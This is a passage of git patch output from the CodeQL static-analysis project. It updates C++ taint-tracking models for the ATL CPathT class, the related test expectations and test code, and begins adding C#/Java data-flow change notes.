constructor_delegation.cpp:19:2:19:15 | MyDerivedValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | | standalone_iterators.cpp:103:27:103:36 | operator+= | (LPCOLESTR,int) | CComBSTR | Append | 1 | @@ -518,134 +518,134 @@ getParameterTypeName | arrayassignment.cpp:124:6:124:9 | sink | 0 | int * | | atl.cpp:28:8:28:8 | operator= | 0 | __POSITION && | | atl.cpp:28:8:28:8 | operator= | 0 | const __POSITION & | -| atl.cpp:49:16:49:16 | operator= | 0 | const tagSAFEARRAYBOUND & | -| atl.cpp:49:16:49:16 | operator= | 0 | tagSAFEARRAYBOUND && | -| atl.cpp:54:16:54:16 | operator= | 0 | const tagVARIANT & | -| atl.cpp:54:16:54:16 | operator= | 0 | tagVARIANT && | -| atl.cpp:58:16:58:16 | operator= | 0 | const tagSAFEARRAY & | -| atl.cpp:58:16:58:16 | operator= | 0 | tagSAFEARRAY && | -| atl.cpp:67:8:67:8 | _U_STRINGorID | 0 | _U_STRINGorID && | -| atl.cpp:67:8:67:8 | _U_STRINGorID | 0 | const _U_STRINGorID & | -| atl.cpp:67:8:67:8 | operator= | 0 | _U_STRINGorID && | -| atl.cpp:67:8:67:8 | operator= | 0 | const _U_STRINGorID & | -| atl.cpp:68:3:68:15 | _U_STRINGorID | 0 | UINT | -| atl.cpp:69:3:69:15 | _U_STRINGorID | 0 | LPCTSTR | -| atl.cpp:193:10:193:12 | Add | 0 | INARGTYPclass:0 | -| atl.cpp:195:10:195:15 | Append | 0 | const CAtlArray & | -| atl.cpp:196:8:196:11 | Copy | 0 | const CAtlArray & | -| atl.cpp:198:6:198:10 | GetAt | 0 | size_t | -| atl.cpp:202:8:202:20 | InsertArrayAt | 0 | size_t | -| atl.cpp:202:8:202:20 | InsertArrayAt | 1 | const CAtlArray * | -| atl.cpp:203:8:203:15 | InsertAt | 0 | size_t | -| atl.cpp:203:8:203:15 | InsertAt | 1 | INARGTYPclass:0 | -| atl.cpp:203:8:203:15 | InsertAt | 2 | size_t | -| atl.cpp:208:8:208:16 | SetAtGrow | 0 | size_t | -| atl.cpp:208:8:208:16 | SetAtGrow | 1 | INARGTYPclass:0 | -| atl.cpp:210:6:210:15 | operator[] | 0 | size_t | -| atl.cpp:256:3:256:10 | CAtlList | 0 | UINT | -| atl.cpp:259:12:259:18 | AddHead | 0 | INARGTYPclass:0 | -| atl.cpp:260:8:260:18 | AddHeadList | 0 | const CAtlList * | -| atl.cpp:262:12:262:18 | AddTail | 0 | INARGTYPclass:0 | -| atl.cpp:263:8:263:18 | AddTailList | 0 | const CAtlList * | -| atl.cpp:264:12:264:15 | Find | 0 | INARGTYPclass:0 | -| atl.cpp:264:12:264:15 | Find | 1 | POSITION | -| atl.cpp:265:12:265:20 | FindIndex | 0 | size_t | -| atl.cpp:266:6:266:10 | GetAt | 0 | POSITION | -| atl.cpp:279:12:279:22 | InsertAfter | 0 | POSITION | -| atl.cpp:279:12:279:22 | InsertAfter | 1 | INARGTYPclass:0 | -| atl.cpp:280:12:280:23 | InsertBefore | 0 | POSITION | -| atl.cpp:280:12:280:23 | InsertBefore | 1 | INARGTYPclass:0 | -| atl.cpp:290:8:290:12 | SetAt | 0 | POSITION | -| atl.cpp:290:8:290:12 | SetAt | 1 | INARGTYPclass:0 | -| atl.cpp:400:8:400:8 | operator= | 0 | IUnknown && | -| atl.cpp:400:8:400:8 | operator= | 0 | const IUnknown & | -| atl.cpp:402:8:402:8 | operator= | 0 | ISequentialStream && | -| atl.cpp:402:8:402:8 | operator= | 0 | const ISequentialStream & | -| atl.cpp:404:8:404:8 | operator= | 0 | IStream && | -| atl.cpp:404:8:404:8 | operator= | 0 | const IStream & | -| atl.cpp:406:8:406:8 | operator= | 0 | const CComBSTR & | -| atl.cpp:408:3:408:10 | CComBSTR | 0 | const CComBSTR & | -| atl.cpp:409:3:409:10 | CComBSTR | 0 | int | +| atl.cpp:50:16:50:16 | operator= | 0 | const tagSAFEARRAYBOUND & | +| atl.cpp:50:16:50:16 | operator= | 0 | tagSAFEARRAYBOUND && | +| atl.cpp:55:16:55:16 | operator= | 0 | const tagVARIANT & | +| atl.cpp:55:16:55:16 | operator= | 0 | tagVARIANT && | +| atl.cpp:59:16:59:16 | operator= | 0 | const tagSAFEARRAY & | +| atl.cpp:59:16:59:16 | operator= | 0 | tagSAFEARRAY && | +| atl.cpp:68:8:68:8 | _U_STRINGorID | 0 | _U_STRINGorID && | +| atl.cpp:68:8:68:8 | _U_STRINGorID | 0 | const _U_STRINGorID & | +| atl.cpp:68:8:68:8 | operator= | 0 | _U_STRINGorID && | +| atl.cpp:68:8:68:8 | operator= | 0 | const _U_STRINGorID & | +| atl.cpp:69:3:69:15 | _U_STRINGorID | 0 | UINT | +| atl.cpp:70:3:70:15 | _U_STRINGorID | 0 | LPCTSTR | +| atl.cpp:194:10:194:12 | Add | 0 | INARGTYPclass:0 | +| atl.cpp:196:10:196:15 | Append | 0 | const CAtlArray & | +| atl.cpp:197:8:197:11 | Copy | 0 | const CAtlArray & | +| atl.cpp:199:6:199:10 | GetAt | 0 | size_t | +| atl.cpp:203:8:203:20 | InsertArrayAt | 0 | size_t | +| atl.cpp:203:8:203:20 | InsertArrayAt | 1 | const CAtlArray * | +| atl.cpp:204:8:204:15 | InsertAt | 0 | size_t | +| atl.cpp:204:8:204:15 | InsertAt | 1 | INARGTYPclass:0 | +| atl.cpp:204:8:204:15 | InsertAt | 2 | size_t | +| atl.cpp:209:8:209:16 | SetAtGrow | 0 | size_t | +| atl.cpp:209:8:209:16 | SetAtGrow | 1 | INARGTYPclass:0 | +| atl.cpp:211:6:211:15 | operator[] | 0 | size_t | +| atl.cpp:257:3:257:10 | CAtlList | 0 | UINT | +| atl.cpp:260:12:260:18 | AddHead | 0 | INARGTYPclass:0 | +| atl.cpp:261:8:261:18 | AddHeadList | 0 | const CAtlList * | +| atl.cpp:263:12:263:18 | AddTail | 0 | INARGTYPclass:0 | +| atl.cpp:264:8:264:18 | AddTailList | 0 | const CAtlList * | +| atl.cpp:265:12:265:15 | Find | 0 | INARGTYPclass:0 | +| atl.cpp:265:12:265:15 | Find | 1 | POSITION | +| atl.cpp:266:12:266:20 | FindIndex | 0 | size_t | +| atl.cpp:267:6:267:10 | GetAt | 0 | POSITION | +| atl.cpp:280:12:280:22 | InsertAfter | 0 | POSITION | +| atl.cpp:280:12:280:22 | InsertAfter | 1 | INARGTYPclass:0 | +| atl.cpp:281:12:281:23 | InsertBefore | 0 | POSITION | +| atl.cpp:281:12:281:23 | InsertBefore | 1 | INARGTYPclass:0 | +| atl.cpp:291:8:291:12 | SetAt | 0 | POSITION | +| atl.cpp:291:8:291:12 | SetAt | 1 | INARGTYPclass:0 | +| atl.cpp:401:8:401:8 | operator= | 0 | IUnknown && | +| atl.cpp:401:8:401:8 | operator= | 0 | const IUnknown & | +| atl.cpp:403:8:403:8 | operator= | 0 | ISequentialStream && | +| atl.cpp:403:8:403:8 | operator= | 0 | const ISequentialStream & | +| atl.cpp:405:8:405:8 | operator= | 0 | IStream && | +| atl.cpp:405:8:405:8 | operator= | 0 | const IStream & | +| atl.cpp:407:8:407:8 | operator= | 0 | const CComBSTR & | +| atl.cpp:409:3:409:10 | CComBSTR | 0 | const CComBSTR & | | atl.cpp:410:3:410:10 | CComBSTR | 0 | int | -| atl.cpp:410:3:410:10 | CComBSTR | 1 | LPCOLESTR | | atl.cpp:411:3:411:10 | CComBSTR | 0 | int | -| atl.cpp:411:3:411:10 | CComBSTR | 1 | LPCSTR | -| atl.cpp:412:3:412:10 | CComBSTR | 0 | LPCOLESTR | -| atl.cpp:413:3:413:10 | CComBSTR | 0 | LPCSTR | -| atl.cpp:414:3:414:10 | CComBSTR | 0 | CComBSTR && | -| atl.cpp:417:11:417:16 | Append | 0 | const CComBSTR & | -| atl.cpp:418:11:418:16 | Append | 0 | wchar_t | -| atl.cpp:419:11:419:16 | Append | 0 | char | -| atl.cpp:420:11:420:16 | Append | 0 | LPCOLESTR | -| atl.cpp:421:11:421:16 | Append | 0 | LPCSTR | -| atl.cpp:422:11:422:16 | Append | 0 | LPCOLESTR | -| atl.cpp:422:11:422:16 | Append | 1 | int | -| atl.cpp:423:11:423:20 | AppendBSTR | 0 | BSTR | -| atl.cpp:424:11:424:21 | AppendBytes | 0 | const char * | -| atl.cpp:424:11:424:21 | AppendBytes | 1 | int | -| atl.cpp:425:11:425:21 | ArrayToBSTR | 0 | const SAFEARRAY * | -| atl.cpp:426:11:426:20 | AssignBSTR | 0 | const BSTR | -| atl.cpp:427:8:427:13 | Attach | 0 | BSTR | -| atl.cpp:428:11:428:21 | BSTRToArray | 0 | LPSAFEARRAY | -| atl.cpp:431:11:431:16 | CopyTo | 0 | BSTR * | -| atl.cpp:433:11:433:16 | CopyTo | 0 | VARIANT * | -| atl.cpp:437:8:437:17 | LoadString | 0 | HINSTANCE | -| atl.cpp:437:8:437:17 | LoadString | 1 | UINT | -| atl.cpp:438:8:438:17 | LoadString | 0 | UINT | -| atl.cpp:439:11:439:24 | ReadFromStream | 0 | IStream * | -| atl.cpp:441:11:441:23 | WriteToStream | 0 | IStream * | -| atl.cpp:446:13:446:22 | operator+= | 0 | const CComBSTR & | -| atl.cpp:447:13:447:22 | operator+= | 0 | LPCOLESTR | -| atl.cpp:537:3:537:15 | CComSafeArray | 0 | const SAFEARRAY * | -| atl.cpp:541:11:541:13 | Add | 0 | const SAFEARRAY * | -| atl.cpp:543:11:543:13 | Add | 0 | const class:0 & | -| atl.cpp:543:11:543:13 | Add | 1 | BOOL | -| atl.cpp:551:6:551:10 | GetAt | 0 | LONG | -| atl.cpp:562:11:562:15 | SetAt | 0 | LONG | -| atl.cpp:562:11:562:15 | SetAt | 1 | const class:0 & | -| atl.cpp:562:11:562:15 | SetAt | 2 | BOOL | -| atl.cpp:564:6:564:15 | operator[] | 0 | long | -| atl.cpp:565:6:565:15 | operator[] | 0 | int | -| atl.cpp:609:3:609:8 | CPathT | 0 | PCXSTR | -| atl.cpp:610:3:610:8 | CPathT | 0 | const CPathT & | -| atl.cpp:614:8:614:19 | AddExtension | 0 | PCXSTR | -| atl.cpp:615:8:615:13 | Append | 0 | PCXSTR | -| atl.cpp:618:8:618:14 | Combine | 0 | PCXSTR | -| atl.cpp:618:8:618:14 | Combine | 1 | PCXSTR | -| atl.cpp:619:22:619:33 | CommonPrefix | 0 | PCXSTR | -| atl.cpp:656:23:656:32 | operator+= | 0 | PCXSTR | -| atl.cpp:716:8:716:10 | Add | 0 | const class:0 & | -| atl.cpp:717:7:717:10 | Find | 0 | const class:0 & | -| atl.cpp:728:6:728:15 | operator[] | 0 | int | -| atl.cpp:729:21:729:29 | operator= | 0 | const CSimpleArray & | -| atl.cpp:762:8:762:10 | Add | 0 | const class:0 & | -| atl.cpp:762:8:762:10 | Add | 1 | const class:1 & | -| atl.cpp:763:7:763:13 | FindKey | 0 | const class:0 & | -| atl.cpp:764:7:764:13 | FindVal | 0 | const class:1 & | -| atl.cpp:767:9:767:18 | GetValueAt | 0 | int | -| atl.cpp:768:8:768:13 | Lookup | 0 | const class:0 & | -| atl.cpp:772:8:772:20 | ReverseLookup | 0 | const class:1 & | -| atl.cpp:773:8:773:12 | SetAt | 0 | const class:0 & | -| atl.cpp:773:8:773:12 | SetAt | 1 | const class:1 & | -| atl.cpp:774:8:774:17 | SetAtIndex | 0 | int | -| atl.cpp:774:8:774:17 | SetAtIndex | 1 | const class:0 & | -| atl.cpp:774:8:774:17 | SetAtIndex | 2 | const class:1 & | -| atl.cpp:813:9:813:17 | operator= | 0 | const CUrl & | -| atl.cpp:815:3:815:6 | CUrl | 0 | const CUrl & | -| atl.cpp:818:15:818:26 | Canonicalize | 0 | DWORD | -| atl.cpp:821:8:821:15 | CrackUrl | 0 | LPCTSTR | -| atl.cpp:821:8:821:15 | CrackUrl | 1 | DWORD | -| atl.cpp:822:15:822:23 | CreateUrl | 0 | LPTSTR | -| atl.cpp:822:15:822:23 | CreateUrl | 1 | DWORD * | -| atl.cpp:822:15:822:23 | CreateUrl | 2 | DWORD | -| atl.cpp:839:15:839:26 | SetExtraInfo | 0 | LPCTSTR | -| atl.cpp:840:15:840:25 | SetHostName | 0 | LPCTSTR | -| atl.cpp:841:15:841:25 | SetPassword | 0 | LPCTSTR | -| atl.cpp:842:15:842:27 | SetPortNumber | 0 | ATL_URL_PORT | -| atl.cpp:843:15:843:23 | SetScheme | 0 | ATL_URL_SCHEME | -| atl.cpp:844:15:844:27 | SetSchemeName | 0 | LPCTSTR | -| atl.cpp:845:15:845:24 | SetUrlPath | 0 | LPCTSTR | -| atl.cpp:846:15:846:25 | SetUserName | 0 | LPCTSTR | +| atl.cpp:411:3:411:10 | CComBSTR | 1 | LPCOLESTR | +| atl.cpp:412:3:412:10 | CComBSTR | 0 | int | +| atl.cpp:412:3:412:10 | CComBSTR | 1 | LPCSTR | +| atl.cpp:413:3:413:10 | CComBSTR | 0 | LPCOLESTR | +| atl.cpp:414:3:414:10 | CComBSTR | 0 | LPCSTR | +| atl.cpp:415:3:415:10 | CComBSTR | 0 | CComBSTR && | +| atl.cpp:418:11:418:16 | Append | 0 | const CComBSTR & | +| atl.cpp:419:11:419:16 | Append | 0 | wchar_t | +| atl.cpp:420:11:420:16 | Append | 0 | char | +| atl.cpp:421:11:421:16 | Append | 0 | LPCOLESTR | +| atl.cpp:422:11:422:16 | Append | 0 | LPCSTR | +| atl.cpp:423:11:423:16 | Append | 0 | LPCOLESTR | +| atl.cpp:423:11:423:16 | Append | 1 | int | +| atl.cpp:424:11:424:20 | AppendBSTR | 0 | BSTR | +| atl.cpp:425:11:425:21 | AppendBytes | 0 | const char * | +| atl.cpp:425:11:425:21 | AppendBytes | 1 | int | +| atl.cpp:426:11:426:21 | ArrayToBSTR | 0 | const SAFEARRAY * | +| atl.cpp:427:11:427:20 | AssignBSTR | 0 | const BSTR | +| atl.cpp:428:8:428:13 | Attach | 0 | BSTR | +| atl.cpp:429:11:429:21 | BSTRToArray | 0 | LPSAFEARRAY | +| atl.cpp:432:11:432:16 | CopyTo | 0 | BSTR * | +| atl.cpp:434:11:434:16 | CopyTo | 0 | VARIANT * | +| atl.cpp:438:8:438:17 | LoadString | 0 | HINSTANCE | +| atl.cpp:438:8:438:17 | LoadString | 1 | UINT | +| atl.cpp:439:8:439:17 | LoadString | 0 | UINT | +| atl.cpp:440:11:440:24 | ReadFromStream | 0 | IStream * | +| atl.cpp:442:11:442:23 | WriteToStream | 0 | IStream * | +| atl.cpp:447:13:447:22 | operator+= | 0 | const CComBSTR & | +| atl.cpp:448:13:448:22 | operator+= | 0 | LPCOLESTR | +| atl.cpp:538:3:538:15 | CComSafeArray | 0 | const SAFEARRAY * | +| atl.cpp:542:11:542:13 | Add | 0 | const SAFEARRAY * | +| atl.cpp:544:11:544:13 | Add | 0 | const class:0 & | +| atl.cpp:544:11:544:13 | Add | 1 | BOOL | +| atl.cpp:552:6:552:10 | GetAt | 0 | LONG | +| atl.cpp:563:11:563:15 | SetAt | 0 | LONG | +| atl.cpp:563:11:563:15 | SetAt | 1 | const class:0 & | +| atl.cpp:563:11:563:15 | SetAt | 2 | BOOL | +| atl.cpp:565:6:565:15 | operator[] | 0 | long | +| atl.cpp:566:6:566:15 | operator[] | 0 | int | +| atl.cpp:610:3:610:8 | CPathT | 0 | PCXSTR | +| atl.cpp:611:3:611:8 | CPathT | 0 | const CPathT & | +| atl.cpp:615:8:615:19 | AddExtension | 0 | PCXSTR | +| atl.cpp:616:8:616:13 | Append | 0 | PCXSTR | +| atl.cpp:619:8:619:14 | Combine | 0 | PCXSTR | +| atl.cpp:619:8:619:14 | Combine | 1 | PCXSTR | +| atl.cpp:620:22:620:33 | CommonPrefix | 0 | PCXSTR | +| atl.cpp:657:23:657:32 | operator+= | 0 | PCXSTR | +| atl.cpp:717:8:717:10 | Add | 0 | const class:0 & | +| atl.cpp:718:7:718:10 | Find | 0 | const class:0 & | +| atl.cpp:729:6:729:15 | operator[] | 0 | int | +| atl.cpp:730:21:730:29 | operator= | 0 | const CSimpleArray & | +| atl.cpp:763:8:763:10 | Add | 0 | const class:0 & | +| atl.cpp:763:8:763:10 | Add | 1 | const class:1 & | +| atl.cpp:764:7:764:13 | FindKey | 0 | const class:0 & | +| atl.cpp:765:7:765:13 | FindVal | 0 | const class:1 & | +| atl.cpp:768:9:768:18 | GetValueAt | 0 | int | +| atl.cpp:769:8:769:13 | Lookup | 0 | const class:0 & | +| atl.cpp:773:8:773:20 | ReverseLookup | 0 | const class:1 & | +| atl.cpp:774:8:774:12 | SetAt | 0 | const class:0 & | +| atl.cpp:774:8:774:12 | SetAt | 1 | const class:1 & | +| atl.cpp:775:8:775:17 | SetAtIndex | 0 | int | +| atl.cpp:775:8:775:17 | SetAtIndex | 1 | const class:0 & | +| atl.cpp:775:8:775:17 | SetAtIndex | 2 | const class:1 & | +| atl.cpp:814:9:814:17 | operator= | 0 | const CUrl & | +| atl.cpp:816:3:816:6 | CUrl | 0 | const CUrl & | +| atl.cpp:819:15:819:26 | Canonicalize | 0 | DWORD | +| atl.cpp:822:8:822:15 | CrackUrl | 0 | LPCTSTR | +| atl.cpp:822:8:822:15 | CrackUrl | 1 | DWORD | +| atl.cpp:823:15:823:23 | CreateUrl | 0 | LPTSTR | +| atl.cpp:823:15:823:23 | CreateUrl | 1 | DWORD * | +| atl.cpp:823:15:823:23 | CreateUrl | 2 | DWORD | +| atl.cpp:840:15:840:26 | SetExtraInfo | 0 | LPCTSTR | +| atl.cpp:841:15:841:25 | SetHostName | 0 | LPCTSTR | +| atl.cpp:842:15:842:25 | SetPassword | 0 | LPCTSTR | +| atl.cpp:843:15:843:27 | SetPortNumber | 0 | ATL_URL_PORT | +| atl.cpp:844:15:844:23 | SetScheme | 0 | ATL_URL_SCHEME | +| atl.cpp:845:15:845:27 | SetSchemeName | 0 | LPCTSTR | +| atl.cpp:846:15:846:24 | SetUrlPath | 0 | LPCTSTR | +| atl.cpp:847:15:847:25 | SetUserName | 0 | LPCTSTR | | bsd.cpp:6:8:6:8 | operator= | 0 | const sockaddr & | | bsd.cpp:6:8:6:8 | operator= | 0 | sockaddr && | | bsd.cpp:12:5:12:10 | accept | 0 | int | From 3abb9049bb1fb9d3aa8031b42c4621ad0de7224e Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 3 Dec 2024 19:06:20 +0000 Subject: [PATCH 0784/1267] C++: Fix testcase to reveal problematic models. --- .../library-tests/dataflow/taint-tests/atl.cpp | 4 ++-- .../dataflow/taint-tests/localTaint.expected | 16 ++++------------ 2 files changed, 6 insertions(+), 14 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index d8f5da01633..0fb0456daa4 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -682,11 +682,11 @@ void test_CPathT() { CPath p2; p2 += p; - sink(p.m_strPath); // $ ir + sink(p2.m_strPath); // $ MISSING: ir CPath p3; p3 += x; - sink(p.m_strPath); // $ ir + sink(p3.m_strPath); // $ MISSING: ir } { diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index c8a2ee98665..41c3822aed5 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -761,28 +761,20 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:680:5:680:5 | p | | | atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:681:10:681:10 | p | | | atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:684:11:684:11 | p | | -| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:685:10:685:10 | p | | -| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:689:10:689:10 | p | | | atl.cpp:680:5:680:5 | ref arg p | atl.cpp:681:10:681:10 | p | | | atl.cpp:680:5:680:5 | ref arg p | atl.cpp:684:11:684:11 | p | | -| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:685:10:685:10 | p | | -| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:689:10:689:10 | p | | | atl.cpp:680:14:680:14 | ref arg x | atl.cpp:688:11:688:11 | x | | | atl.cpp:680:14:680:14 | ref arg x | atl.cpp:694:15:694:15 | x | | | atl.cpp:680:14:680:14 | ref arg x | atl.cpp:699:24:699:24 | x | | | atl.cpp:680:14:680:14 | ref arg x | atl.cpp:705:30:705:30 | x | | | atl.cpp:681:10:681:10 | p [post update] | atl.cpp:684:11:684:11 | p | | -| atl.cpp:681:10:681:10 | p [post update] | atl.cpp:685:10:685:10 | p | | -| atl.cpp:681:10:681:10 | p [post update] | atl.cpp:689:10:689:10 | p | | -| atl.cpp:681:12:681:20 | ref arg m_strPath | atl.cpp:685:12:685:20 | m_strPath | | -| atl.cpp:681:12:681:20 | ref arg m_strPath | atl.cpp:689:12:689:20 | m_strPath | | | atl.cpp:683:11:683:12 | call to CPathT | atl.cpp:684:5:684:6 | p2 | | +| atl.cpp:683:11:683:12 | call to CPathT | atl.cpp:685:10:685:11 | p2 | | +| atl.cpp:684:5:684:6 | ref arg p2 | atl.cpp:685:10:685:11 | p2 | | | atl.cpp:684:11:684:11 | call to operator char *& | atl.cpp:684:8:684:8 | call to operator+= | TAINT | -| atl.cpp:684:11:684:11 | ref arg p | atl.cpp:685:10:685:10 | p | | -| atl.cpp:684:11:684:11 | ref arg p | atl.cpp:689:10:689:10 | p | | -| atl.cpp:685:10:685:10 | p [post update] | atl.cpp:689:10:689:10 | p | | -| atl.cpp:685:12:685:20 | ref arg m_strPath | atl.cpp:689:12:689:20 | m_strPath | | | atl.cpp:687:11:687:12 | call to CPathT | atl.cpp:688:5:688:6 | p3 | | +| atl.cpp:687:11:687:12 | call to CPathT | atl.cpp:689:10:689:11 | p3 | | +| atl.cpp:688:5:688:6 | ref arg p3 | atl.cpp:689:10:689:11 | p3 | | | atl.cpp:688:11:688:11 | ref arg x | atl.cpp:694:15:694:15 | x | | | atl.cpp:688:11:688:11 | ref arg x | atl.cpp:699:24:699:24 | x | | | atl.cpp:688:11:688:11 | ref arg x | atl.cpp:705:30:705:30 | x | | From c3086d4ecda3b5c8ba986fb89c9c7ad408daad3b Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 3 Dec 2024 19:13:00 +0000 Subject: [PATCH 0785/1267] C++: Fix models and accept test changes. --- cpp/ql/lib/ext/CPathT.model.yml | 7 ++++--- .../dataflow/external-models/flow.expected | 10 +++++----- .../dataflow/external-models/validatemodels.expected | 1 - cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp | 4 ++-- 4 files changed, 11 insertions(+), 11 deletions(-) diff --git a/cpp/ql/lib/ext/CPathT.model.yml b/cpp/ql/lib/ext/CPathT.model.yml index 2138dd6c942..8211343d479 100644 --- a/cpp/ql/lib/ext/CPathT.model.yml +++ b/cpp/ql/lib/ext/CPathT.model.yml @@ -3,7 +3,7 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CPathT", True, "CPathT", "", "", "Argument[*1]", "Argument[-1]", "value", "manual"] + - ["", "CPathT", True, "CPathT", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CPathT", True, "AddExtension", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - ["", "CPathT", True, "Append", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - ["", "CPathT", True, "Combine", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] @@ -18,5 +18,6 @@ extensions: # - ["", "CPathT", True, "operator const T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] # - ["", "CPathT", True, "operator T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - ["", "CPathT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CPathT", True, "operator +=", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CPathT", True, "operator +=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["", "CPathT", True, "operator+=", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CPathT", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["", "CPathT", True, "operator+=", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 3c5b69b09f4..a8a3e5a209a 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected @@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:809 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:807 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:808 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:810 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:808 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:809 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:808 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:809 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:809 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:810 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index 166d834ea76..39dade25325 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected @@ -1,4 +1,3 @@ -| Dubious member name "operator +=" in summary model. | | Dubious member name "operator BSTR" in summary model. | | Dubious member name "operator LPCSTR" in summary model. | | Dubious member name "operator LPSAFEARRAY" in summary model. | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 0fb0456daa4..a6638ad3f56 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -682,11 +682,11 @@ void test_CPathT() { CPath p2; p2 += p; - sink(p2.m_strPath); // $ MISSING: ir + sink(p2.m_strPath); // $ MISSING: ir // this requires flow through `operator StringType&()` which we can't yet model in MaD CPath p3; p3 += x; - sink(p3.m_strPath); // $ MISSING: ir + sink(p3.m_strPath); // $ ir } { From 5042753b29f5048f098264321a4efba8cce7bc1e Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Wed, 4 Dec 2024 10:20:43 +0100 Subject: [PATCH 0786/1267] C#/Java: Add change notes. --- .../change-notes/2024-12-04-dataflow-type-pruning-tweak.md | 4 ++++ .../change-notes/2024-12-04-dataflow-type-pruning-tweak.md | 4 ++++ 2 files changed, 8 insertions(+) create mode 100644 csharp/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md create mode 100644 java/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md diff --git a/csharp/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md b/csharp/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md new file mode 100644 index 00000000000..258c0e5326b --- /dev/null +++ b/csharp/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* The data flow library has been updated to track types in a slightly different way: The type of the tainted data (which may be stored into fields, etc.) is tracked more precisely, while the types of intermediate containers for nested contents is tracked less precisely. This may have a slight effect on false positives for complex flow paths. diff --git a/java/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md b/java/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md new file mode 100644 index 